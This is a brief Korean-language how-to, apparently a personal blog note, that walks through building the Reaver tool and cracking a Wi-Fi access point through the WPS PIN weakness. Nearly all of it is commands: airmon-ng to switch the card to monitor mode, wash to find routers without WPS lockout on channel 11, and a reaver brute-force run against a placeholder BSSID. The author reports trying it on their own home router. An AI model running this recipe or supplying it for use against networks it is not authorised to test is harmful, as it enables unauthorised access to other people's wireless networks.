apt-get install libpcap-dev libsqlite3-dev
2개의 패키지가 설치되어 있어야 함
그리고 아래 사이트에서 다운로드한다.
https://code.google.com/p/reaver-wps/
압축을 풀고
./configure
make && make install
airmon-ng를 실행시켜서 무선랜을 moniter mode로 전환, WPS Pin 공격이 가능한 대상이 있는지 채널 11을 scan(Locked가 No인 경우 공격 가능함)
airmon-ng start wlan0
wash -i mon0 -c 11 -C -s
그 후 brute force 공격 시작함
reaver -i mon0 -f -c 11 -b AA:AA:AA:AA:AA:AA -vv -x 60
아래 스샷은 집에 무선ap를 대상으로 시도한 결과인데, 집의 무선ap는 WPS 공격에 대비하여 60초 딜레이가 걸려 있어서 바로 PIN번호 입력해서 테스트 해봄
https://code.google.com/p/reaver-wps/wiki/README
http://adaywithtape.blogspot.kr/2012/01/cracking-wpa-using-wps-vulnerability.html